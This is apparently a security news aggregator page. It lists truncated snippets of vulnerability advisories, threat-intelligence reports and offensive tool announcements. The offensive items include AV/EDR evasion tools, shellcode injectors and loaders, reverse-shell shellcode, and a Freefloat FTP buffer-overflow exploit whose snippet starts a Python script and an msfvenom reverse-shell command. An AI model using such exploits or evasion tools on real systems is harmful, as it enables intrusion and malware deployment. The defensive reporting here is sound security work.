Sandsprite scdbg Security Vulnerability

Scdbg is sandsprite open source a multi-platform open source Shellcode simulation run, analysis tools. A security vulnerability exists in Sandsprite scdbg version 1.0 that stems from an uncontrolled resource consumption vulnerability found on Sandsprite Scdbg.exe that allows an attacker to send a...

PT-2024-15665 · Sandsprite · Scdbg.Exe

Name of the Vulnerable Software and Affected Versions: Sandsprite Scdbg.exe version 1.0 Description: An Uncontrolled Resource Consumption issue has been found, allowing an attacker to send a specially crafted shellcode payload to the "/foff" parameter, causing an application shutdown. A malware...

BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes

Little AV/EDR Evasion Lab for training & learning purposes. ️ under construction..​ | | | | | | \ / \ / | | | | | \ / / | | | | | | | | | | | | | | | | | | ' \ / \ | | | /\ \ | | || || | | || | | | | | | | | / |/||/| ||/|| \ /|| || || ||| | / | | | | | | |/| |/ | '| |/ / \ | | | | | | | |...

Cloud Atlas' Spear-Phishing Attacks Target Russian Agro and Research Companies

The threat actor referred to as Cloud Atlas has been linked to a set of spear-phishing attacks on Russian enterprises. Targets included a Russian agro-industrial enterprise and a state-owned research company, according to a report from F.A.C.C.T., a standalone cybersecurity company formed after...

ProcessStomping - A Variation Of ProcessOverwriting To Execute Shellcode On An Executable'S Section

A variation of ProcessOverwriting to execute shellcode on an executable's section What is it For a more detailed explanation you can read my blog post Process Stomping, is a variation of hasherezade’s Process Overwriting and it has the advantage of writing a shellcode payload on a targeted sectio...

A deep dive into Phobos ransomware, recently deployed by 8Base group

Cisco Talos has recently observed an increase in activity conducted by 8Base, a ransomware group that uses a variant of the Phobos ransomware and other publicly available tools to facilitate their operations. Most of the groups Phobos variants are distributed by SmokeLoader, a backdoor trojan. Th...

Linux/x64 - create a shell with execve() sending argument using XOR (/bin//sh) Shellcode (55 bytes)

Exploit Title: Linux-x64 - create a shell with execve sending argument using XOR /bin//sh 55 bytes Shellcode Author: Alexys 0x177git Tested on: Linux x8664 Shellcode Description: creating a new process using execve syscall sending bin//sh as argument | encrypted using XOR operation was QWORD size...

Dvenom - Tool That Provides An Encryption Wrapper And Loader For Your Shellcode

Double Venom DVenom is a tool that helps red teamers bypass AVs by providing an encryption wrapper and loader for your shellcode. Capable of bypassing some well-known antivirus AVs. Offers multiple encryption methods including RC4, AES256, XOR, and ROT. Produces source code in C, Rust, PowerShell...

A cascade of compromise: unveiling Lazarus’ new campaign

Earlier this year, a software vendor was compromised by the Lazarus malware delivered through unpatched legitimate software. Whats remarkable is that these software vulnerabilities were not new, and despite warnings and patches from the vendor, many of the vendors systems continued to use the...

RecycledInjector - Native Syscalls Shellcode Injector

Currently Fully Undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is also based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails. To remain stealthy and keep entropy on the final...

ModuleShifting - Stealthier Variation Of Module Stomping And Module Overloading Injection Techniques That Reduces Memory IoCs

ModuleShifting is stealthier variation of Module Stomping and Module overloading injection technique. It is actually implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the usage of compiled loaders. The technique can be used...

HTTPSnoop and PipeSnoop Malware Target Telecoms in the Middle East

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary HTTPSnoop and PipeSnoop malware targeting Middle East telecom providers, part of the ShroudedSnooper intrusion set, masquerading as legitimate components while executing shellcode via HTTP and IPC pipes,...

Microsoft Teams used to deliver DarkGate Loader malware

Researchers have found a new method by which cybercriminals are spreading the DarkGate Loader malware. Until now, DarkGate was typically distributed via phishing emails. The malspam campaign used stolen email threads to lure victims into clicking a hyperlink, which downloaded the malware. But...

Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)

import ctypes, struct import argparse from keystone import Exploit Title: Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode 476 Bytes Exploit Author: Senzee Date: 08/29/2023 Platform: Windows X64 Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter OS Versi...

Freefloat FTP Server 1.0 Buffer Overflow

Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow Date: 08/22/2023 Exploit Author: Waqas Ahmed Faroouqi ZEROXINN Vendor Homepage: http://www.freefoat.com Version: 1.0 Tested on Windows XP SP3 !/usr/bin/python import socket Metasploit Shellcode msfvenom -p...

Freefloat FTP Server 1.0 - (PWD) Remote Buffer Overflow Exploit

Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow Exploit Author: Waqas Ahmed Faroouqi ZEROXINN Vendor Homepage: http://www.freefoat.com Version: 1.0 Tested on Windows XP SP3 !/usr/bin/python import socket Metasploit Shellcode msfvenom -p windows/shellreversetcp...

CVE-2023-31447

userlogin.cgi on Draytek Vigor2620 devices before 3.9.8.4 and on all versions of Vigor2925 devices allows attackers to send a crafted payload to modify the content of the code segment, insert shellcode, and execute arbitrary code...

Code injection

userlogin.cgi on Draytek Vigor2620 devices before 3.9.8.4 and on all versions of Vigor2925 devices allows attackers to send a crafted payload to modify the content of the code segment, insert shellcode, and execute arbitrary code...

Draytek Vigor2620 安全漏洞

The DrayTek Draytek Vigor2620 is a wireless router from China-based DrayTek. A security vulnerability exists in the Draytek Vigor2620 prior to version 3.9.8.4, which originates in userlogin.cgi and allows an attacker to send a crafted payload that modifies the contents of a snippet, inserts...

Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)

Shellcode Title: Linux/x64 - memfdcreate ELF loader 170 bytes Shellcode Author: Ivan Nikolsky enty8080 & Tomas Globis tomasglgg Tested on: Linux x8664 Shellcode Description: This shellcode attempts to establish reverse TCP connection, reads ELF length, reads ELF and maps it into the memory, creat...